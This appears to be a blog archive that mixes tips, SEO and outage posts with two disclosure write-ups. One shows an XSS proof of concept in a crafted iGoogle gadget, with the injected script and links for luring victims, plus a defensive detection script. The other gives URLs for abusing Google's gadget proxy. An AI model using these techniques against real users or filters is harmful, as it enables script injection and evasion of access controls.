In the quest to be harder, better, faster and geekier than ever, this article will help you make up for your incompleteness and your total lack of ingenuity.

With your multi-touch keyboard, you should know that holding down the Shift or Ctrl key while clicking on tabs groups them into a single selection, the obvious aim being to gather a whole crowd of tabs and act on them at once.

Selection with control of my favorite sites:

Selection with shift:

Pin / to favorites / close:

Admit it, that's hot.


iGoogle is a service of Google. Its features include the ability to add web feeds and gadgets to a personalized homepage. Google also lets any user create their own gadget.

  1. Write crafted gadget
  2. Submit crafted gadget
  3. Share it
  4. Exploit it!

Then, here we go…

1. Write crafted gadget

I got the “Google News” gadget by downloading the following XML file:

http://www.gstatic.com/ig/modules/tabnews/kennedy/tabnews.xml

and added my <script> at the end, like this:

…
ud=K.getString(x),vd=K.getMsg(x),wd=/\.cn$/.test(location.host);wd||!ud||ud==vd?pd():sd(ud); window.updateCustomEdit=kd;window.saveConfig=td;window.hideSettingsBlock=jd;})()</script>
<script>alert(/XSS by @MaKyOtOx/);</script>
<div id=settings_mask onclick="return false;"></div>
<div id=settings_block>
<div id=settings_content></div>
</div>
</Content></Module>


2. Submit crafted gadget

I uploaded my XML here: http://www.makyoto.fr/xss/poc.xml

Then, once I had customized my gadget, I submitted it here: http://www.google.com/ig/submit

No error was reported for the crafted XML file, so it's OK: my poc.xml is ready to be used as a gadget ^^


3. Share it

It is easy to share this gadget with friends using the official sharing features. The following links can be sent to the victim:

http://www.google.com/ig/adde?moduleurl=www.makyoto.fr/xss/poc.xml%253C&source=imag

or

http://www.google.com/ig/directory?type=gadgets&url=www.makyoto.fr/xss/poc.xml


If you choose to add my gadget, a widget will now be present in your iGoogle dashboard.


4. Exploit it!

You are bad guys …


The Google Security Team answered me: “the domain in which the feature is hosted – gmodules.com – is specifically meant as a compartmentalized ‘sandbox’ for various types of potentially unsafe, user-controlled content. This domain is isolated from any sensitive content due to the same-origin policy.”

Yes, they're right, because I cannot access the user's auth cookies, but I can render and script whatever I want inside the gadget… And what if an attacker could access the XML files of popular gadgets?

Nevertheless, I continue to believe there is a vulnerability, because the XML file isn't sufficiently sanitized before being processed.
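As an added example (not code from the original post, nor from Google), here is a Python check a gadget reviewer could run: it parses a gadget's XML, pulls the inline <script> bodies out of the html Content section, and reports any that are absent from the trusted upstream copy, which is exactly what the appended alert() above would trip. The two gadget documents are constructed stand-ins for tabnews.xml and poc.xml, not the real files.

```python
import hashlib
import re
import xml.etree.ElementTree as ET

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)

# Constructed samples: a trimmed stand-in for the trusted gadget XML and a copy
# with one inline script appended, as described in the post. Not the real files.
TRUSTED_GADGET = """<Module>
<ModulePrefs title="Google News" />
<Content type="html"><![CDATA[
<script>window.saveConfig=function(){};</script>
<div id=settings_mask onclick="return false;"></div>
]]></Content></Module>"""

CRAFTED_GADGET = """<Module>
<ModulePrefs title="Google News" />
<Content type="html"><![CDATA[
<script>window.saveConfig=function(){};</script>
<script>alert(/XSS by @MaKyOtOx/);</script>
<div id=settings_mask onclick="return false;"></div>
]]></Content></Module>"""


def script_blocks(gadget_xml):
    """Return the inline <script> bodies found in every html Content section."""
    root = ET.fromstring(gadget_xml)
    blocks = []
    for content in root.iter("Content"):
        # type="url" gadgets carry no inline markup; the default type is html
        if content.get("type", "html") != "html" or not content.text:
            continue
        blocks.extend(body.strip() for body in SCRIPT_RE.findall(content.text))
    return blocks


def added_scripts(trusted_xml, submitted_xml):
    """Script bodies present in the submitted gadget but not in the trusted one."""
    # compare SHA-256 digests so a reviewer can log hashes rather than script text
    known = {hashlib.sha256(b.encode()).hexdigest() for b in script_blocks(trusted_xml)}
    return [b for b in script_blocks(submitted_xml)
            if hashlib.sha256(b.encode()).hexdigest() not in known]


if __name__ == "__main__":
    for body in added_scripts(TRUSTED_GADGET, CRAFTED_GADGET):
        print("added inline script:", body)
```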


Tweets are welcome @MaKyOtOx and @devquotes


There are several ways to use Google's sites as HTTP proxies:

There are at least two other ways to use Google as a proxy, by going through the gadgets dedicated to the iGoogle portal. Both methods are reachable without any prior authentication:

PoC#1: http://www.ig.gmodules.com/gadgets/proxy/container=ig&gadget=http%3A%2F%2Fgoogle.com/http://www.site_interdit.xxx
(yes, the end of the payload looks odd, but that is expected)
PoC#2: http://www.ig.gmodules.com/gadgets/makeRequest?httpMethod=GET&container=ig&url=http%3A%2F%2Fwww.site_interdit.xxx

For both PoCs, a file named “p.txt” is downloaded. It contains the response to your request.

Google's security team was contacted; they consider this a “by design feature”. A few usage limitations have been put in place, such as restricting it to the HTTP(S) protocols and to a defined set of ports.

Comments are welcome!


Hey SEO dudez,

A little SEO news: Google is updating PR (PageRank) on all its DCs (data centers). The PR of most of my own sites has changed. Can we say this precious indicator is back?

“Precious”, you said? Many people say they don't care about PR, but the difference between a PR1 page and a PR5 page is HUGE! Nobody cares, yet everyone wants one :)

For the moment, have a check on: http://www.seocentro.com/tools/search-engines/pagerank-dc.html (an old tool, but a working one).

Here is a list of working Google DCs. Let us know about your PR update in the comments: have your sites been granted one?

The more testimonies we have, the better we'll be able to discuss it.


First article, and it's for “bad” news.

On this 3rd of November 2010, Google Analytics decided to take some holidays. Almost all my statistics are not working; my visit counters are downright null this morning.

I thought I had a problem on my servers, but I didn't, and there is still no news from the Google Analytics Blog at the moment, 12:30 pm.

